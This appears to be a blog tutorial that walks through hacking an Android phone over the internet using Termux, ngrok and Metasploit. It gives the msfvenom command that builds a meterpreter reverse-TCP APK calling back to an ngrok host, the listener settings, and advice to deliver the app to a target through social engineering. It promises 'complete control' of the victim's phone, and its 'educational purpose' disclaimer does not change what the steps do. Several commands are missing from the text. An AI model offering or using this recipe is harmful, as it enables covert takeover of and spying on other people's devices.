Hello guys through this article i wanna show you how you could easily gain access over an android device using metasploit and ngrok using Termux.
Disclaimer: TO BE USED FOR EDUCATIONAL PURPOSE ONLY!!
So lets get started by getting to know what is metasploit. Metasploit is the world’s most used penetration testing framework which enables you to find, exploit and validate vulnerabilities. It is developed by Rapid7 and is the most preferred framework for penetration testing.
So how does Ngrok come in the picture??
The answer is while testing for external(WAN) networks using metasploit we are required to make some complex configurations like port forwarding , having a static IP etc. Using Ngrok you can skip these complexities .
Firstly download Termux from play store into your android device.
You then need to visit Ngrok’s website and signup first to get an account then download the linux(arm) version on your android phone you will have the file downloaded in your phone and you will have an activation key in the window we will use it later on so don’t close the tab.
Open Termux in your android phone and type the command ls
If you don’t see a folder named storage the type the following command.
If you again type in the ls command you will see a folder named storage.To open that folder type
then go to downloads folder by typing the command
now if you type ls you will see all your downloads copy the name of the ngrok zip file and type in the command
This command will unzip the file now you would move the file from downloads to Termux by typing the command
mv ngrok /$HOME
Now you would land up in the termux root so you would need to change the permissions of the folder you just moved by typing the command
chmod +x ngrok
Now to execute the file type
Now you would be required to authenticate your account by copying the auth token from the page where you downloaded your ngrok zip file copy the auth token and in the termux type the following
./ngrok authtoken (your auth token)
Now your account is authenticated and your token will be saved in a configuration file. Now open the hotspot of your android device and to run ngrok type the command
./ngrok tcp 4543
You can provide any port I’m giving 4543. now open a new termux session by swiping from the left and clicking on new session DON’T CLOSE THIS SESSION. In the new session type the command
pkg install unstable-repo
Then you would be required to install metasploit by typing the command
pkg install metasploit
The next CRUCIAL step is to create a Payload. To create a payload you would need to understand certain keywords associated with any metasploit payload. The keywords or parameters of our concern are LHOST and LPORT.
HERE LHOST=0.tcp.ngrok.io (which you can see in the forwarding row in the ngrok session) & LPORT is 17143 (which is right next to the : )
Now to create a Payload using metasploit type the following command
msfvenom -p android/meterpreter/reverse_tcp LHOST =0.tcp.ngrok.io LPORT = 17143 R> sample.apk
The above command would create a Payload application which would be stored in termux root. To move the application to your phone storage type
mv sample.apk /storage/emulated/0/
Now we have reached the final and most important step that is to use the metasploit framework to gain access over the target device. To run metasploit type
NOTE:-THE NGROK SESSION MUST ALWAYS BE ONLINE THROUGHOUT THE PROCESS.
You can send the apk file to your target by any means either by social engineering or any other method.
Now in the metasploit session type in the following commands one by one
set LHOST localhost
set LPORT 4543
The above commands would be the same for all if you used the same port as mine. Now finally type
By this time you would be listening to connections on the specified port.Now when the target device installs the application you created you would establish a connection with the target device and you would gain complete control over the target phone.
When a connection is established you would look at a screen like this
In the meterpreter session you can type the command help to show all the available options and explore the commands.
Congratulations you have successfully learned how to hack into a target android over WAN using metasploit and ngrok.